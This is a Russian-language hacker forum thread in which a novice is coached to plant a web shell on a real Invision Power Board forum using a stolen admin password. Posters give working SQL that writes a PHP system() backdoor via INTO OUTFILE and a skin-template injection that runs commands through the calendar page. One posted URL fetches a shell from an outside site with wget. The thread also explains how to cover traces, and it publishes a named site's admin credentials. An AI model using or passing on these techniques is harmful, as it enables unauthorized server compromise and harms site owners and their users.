Ошибка с шеллом в Ipb 1.3
 

Вот, получил пароль админа, залил шелл через смайлы потом если через /forum/html/emoticons/antichatl.php перехожу то меня перекидывает на http://err.agava.ru/vh/cgierr/17/

Испровобал 2 шелла nts21Viev.php кажется такое еще...

Что мне делать? Как мне быть?

с чего ты взял, что ты его залил?

Ну да ну да... Не пинайте меня, я ведь новичек совсем, надо ведь чему то учиться?) А так я решил так как не было The uploading failed как было во всех предыдущих форумах...



Не могу в MySQL найти никак, можете подсказать где именно? (phtml)

В настройках нет атачей, так что я не могу прописать application/octet-stream и phtml :mad:

Через смайлы выходит что ничего не добавляется

Добавления настроек там вообще нет..

Просмотрел все темы про заливку шелла но ни один не подошел...

Потому собственно и спрашиваю...(

ЗЫ Замена HTML шаблона не проходит тоже...(

Значит плохо искал, в ипб 1.* есть способ заливки через MySQL, поищи яуже не раз писал про этот метод

Почему то когда пытался залить в папку uploads вывалило
Access denied for user: 'anabole8_admbd@localhost' (Using password: YES)

Как от этого избавиться?

Команда была такой:
SELECT '<?php system($_GET[cmd]); ?>' FROM mysql.user INTO OUTFILE '/home/anabole8/public_html/forum/uploads/shell.php'

Лучше попытайся залить в папку с аватарками, на заливку в /uploads/ у тебя может быть нет прав.

аа, ты через скуль заливал... скорее всего и правда прав на инто+аутфайл нету.

Это означает, что пользователь anabole8_admbd не имеет доступа в системную таблицу mysql или прав на исполнение команды OUTFILE. Скорее всего второе.

селекти из таблицы форума любой. Утебя нет прав на системные тадлицы. т.е. твой юзер не является рутовым,что обычно нужно для Mysql.user

Ну тогда выходит залить шелл на этот форум нереально?
Ну тогда сами посмотрите если хотите... www.anabolex.ru/forum admin : yehakqag Буду другие форумы значит искать((

тебе БР написал выше, селект делать нужно из любой существующей таблицы форума, т.к. мускул запущен не из под рута, доступа к mysql.user нету. Но если честно, я очень сомневаюсь, что у тебя есть аутфайл-права.

Нет, не идет, всеравно нет прав( Ни в аватарки ни из другой таблицы, да и все вместе не работает


Я уже 6 форумов нашел, проверю там, может что получится...

По крайней мере на одном было точно также, а на другом я вообще не смог зайти в админку... Были только нарисованы два квадрата и < между ними... :confused:

Нет, я еще один способ забыл=) Через календарь, запрос прошел, а именно:
update ibf_skin_templates set func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb" where func_name="calendar_start_form";

Но я не понял что за календарь и как там вводить команды? Объясните пожалуйста, я уже близок к заливке шелла хоть?)

И еще, я так понят там надо с сайта заливать, ну так вот, сможете плз дать ссылку если у вас гдето залито а то щас с народом рабираться еще,.. :(

Заранее огромное спасибо ввиде +) ;)

этот способ я и имел ввиду!
Способ здесь прокатил на ура, ссылку на шел и объяснение прислал в ПМ.

Дык я же не понял где календарь)))) А за залитие спасибо, просто сам хочу научиться)

Ссылка на календарь находиться в правом верхнем углу ( или по такой ссылки http://host/path_to_forum/index.php?act=calendar)

идем в админку, выбираем Управление SQL -> Средства MySQL. Внизу страницы будет поле самостоятельный запрос, туда пишем
ibf - префикс, который может меняться

Жмем запустить запрос,если все прошло удачно видим Execute successfully( по русски не помню как будет)
Дальше идем в системные настройки -> главная конфигурация.
Там выбираем Использовать безопасный режим скинов? Да.
Идем в календарь, как туда попасть писал выше.
Что бы юзать команды, делаем так:
http://host/path_to_forum/index.php?act=calendar&c=id

Скрываем наши следы:
Для этого снимаем безопасный режим для скинов и запускаем такой запрос:
Иногда этот метод не работает!

http://host/path_to_forum/index.php?act=calendar&c=id А дальше писать get... где? В самой ссылке или в добавлении нового события?)

Если в ссылке то напиши ссылку пример пожалуйста...

пиешь так
http://host/path_to_forum/index.php?act=calendar&c=cd uploads;wget site.ru/shell.php;ls

идешь сюда
http://host/path_to_forum/uploads/shell.php

Спасибо огромное!

Чтобы темы не создавать новой, есть ли команда для заливки шелла с компа а не с сайта, а то возьться с сайтом лень так..

Залей на любой фрихост и пользуйся
С компа получится, если ты поднимешь у себя дома веб-сервер :)

Ну лпдно) Спасибо и на этом_)

Давай мы тебе будем сайты открывать, и шеллы туда заливать? Так устроит? =)

) Спасибо, у меня уже есть такой помощник ;) Друг мой....

А вот теперь уже проблема с шеллом... ЗАЛИЛ через смайлы но ачатовский шелл запросил пароль, че вводить то? Пытался ввести логин и пасс админа, ничего...

PS Lee_roy Я действительно залил шелл в прошлый раз....

хаха! откуда ты его скачал? Я еще его редактировал и смотрел пароль в нем какой установлен!
Во, ржачно будет, если этот пароль вписать в тот шел откуда ты его брал! тогда вместо одного хакнутого сайта, будет 2
-------------------------next---------------------
попробуй залить другой шел.

Хм, а ведь точно!) Я думал тот был без пароля а вот только вспомнил что не я заливал шелл)))) А maxster) В общем я у тебя уже забрал шелл считай) Скачал с того сатйа...